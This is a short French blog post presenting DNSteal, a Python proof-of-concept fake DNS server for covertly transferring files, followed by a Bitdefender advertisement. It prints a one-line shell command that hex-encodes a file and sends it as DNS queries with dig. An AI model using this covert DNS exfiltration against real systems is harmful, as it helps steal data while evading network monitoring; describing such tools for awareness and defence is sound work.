Aller au contenu
Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Transférer des fichiers en utilisant des requêtes DNS

Voici un proof of concept intéressant qui s’appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers.

Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l’image send.png au faux serveur DNS.

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

C’est plutôt rigolo non ?

dnssteal

DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s’est fait plaisir 🙂

Si vous voulez plus d’infos, c’est sur Github que ça se passe.


Bitdefender Total Security 120 jours pour vous faire un avis

Bloque les menaces Des millions d’utilisateurs utilisent les solutions de sécurité Bitdefender dans le monde. Bitdefender s’appuie sur une intelligence artificielle avancée ainsi que sur d’autres technologies révolutionnaires afin d’anticiper, de détecter et de bloquer instantanément les menaces mêmes les plus récentes, avant qu’elles ne puissent vous causer le moindre préjudice.

Sans ralentir vos appareils. Découvrez le potentiel complet de votre appareil numérique. Bitdefender utilise un minimum de ressources, tandis que nos outils d’optimisation peuvent améliorer le temps de démarrage et les performances globales de votre ordinateur.

Essayez Bitdefender gratuitement – 120 jours au lieu de 30 !

Partenaire

Les articles du moment